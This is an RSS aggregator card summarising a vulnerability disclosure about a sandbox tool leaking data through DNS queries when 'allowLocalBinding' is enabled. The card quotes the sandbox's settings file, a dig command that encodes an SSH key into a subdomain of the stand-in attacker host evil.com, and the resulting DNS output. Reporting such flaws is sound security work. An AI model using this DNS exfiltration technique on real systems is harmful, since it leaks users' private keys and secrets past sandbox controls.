All Topics
All Topics
Technology
Technology
Design
Design
Programming
Programming
Science
Science
News
News
Gaming
Gaming
Entertainment
Entertainment
Business
Business
Finance
Finance
Sports
Sports
Health
Health
Food
Food
Travel
Travel
Art
Art
Music
Music
Books
Books
Education
Education
Politics
Politics
Personal
Personal
No algorithm. No AI slop. No ads. Just RSS. Pro-human. Indie writers. Real journalism. Open web. Chronological. Hand toasted.

Security Vulnerability: Data Exfiltration via DNS Resolution with allowLocalBinding Enabled

By

m-hodges

4mo ago· 2 min readenCode
Bagel score 55 of 100
55/100
Doughy
Bagelometer

Pale, doughy, and a touch sad. Eat if peckish.

Score55TypeanalysisSentimentneutral

Summary

The article demonstrates a security vulnerability where DNS resolution can be exploited for data exfiltration when the 'allowLocalBinding' setting is enabled to true. It shows how an attacker can use DNS queries to exfiltrate sensitive data like SSH keys by encoding them in domain names and querying malicious DNS servers. The example includes configuration settings and a command execution showing DNS resolution of a domain containing sensitive data.

Key quotes

· 4 pulled
srt --settings settings.json 'dig your-ssh-key.a.evil.com'
settings.json { "network": { "allowedDomains": [], "deniedDomains": [], "allowLocalBinding": true }, "filesystem": { "denyRead": [], "allowWrite": [], "denyWrite": [] } }
;; QUESTION SECTION: your-ssh-key.a.evil.com. IN A
your-ss
Snippet from the RSS feed
settings.json { "network": { "allowedDomains": [], "deniedDomains": [], "allowLocalBinding": true }, "filesystem": { "denyRead": [], "allowWrite": [], "denyWrite": [] } } command srt --settings set...

You might also wanna read

TLS Certificate Validation Methods for Onion Services

This technical document examines various approaches and proposals for integrating TLS/HTTPS certificate validation specifically for Onion Se

onionservices.torproject.org·9mo ago

Project Glasswing: AI-assisted vulnerability detection finds over 10,000 critical software flaws

Project Glasswing is a collaborative effort launched to secure critical software against potential threats from increasingly capable AI mode

anthropic.com·1h ago

Project Glasswing: AI-assisted vulnerability detection finds over 10,000 critical software flaws

Project Glasswing is a collaborative effort launched to secure critical software against potential threats from increasingly capable AI mode

anthropic.com·1h ago

North Korean Group Famous Chollima Compromises Packagist Package to Target PHP Developers

A cybersecurity threat report detailing how the threat actor group "Famous Chollima" (linked to North Korea) targeted PHP developers by comp

hendryadrian.com·2h ago

North Korean Chollima Group Targets PHP Developers via Malicious Packagist Package

A malicious obfuscated JavaScript payload was discovered appended to tailwind.js in the Packagist development version dev-drewroberts/featur

socket.dev·13h ago

Microsoft uncovers supply chain attack: Compromised @antv npm packages steal CI/CD credentials via Mini Shai-Hulud malware

Microsoft has identified an active supply chain attack targeting the @antv npm package ecosystem. A threat actor compromised an @antv mainta

microsoft.com·1d ago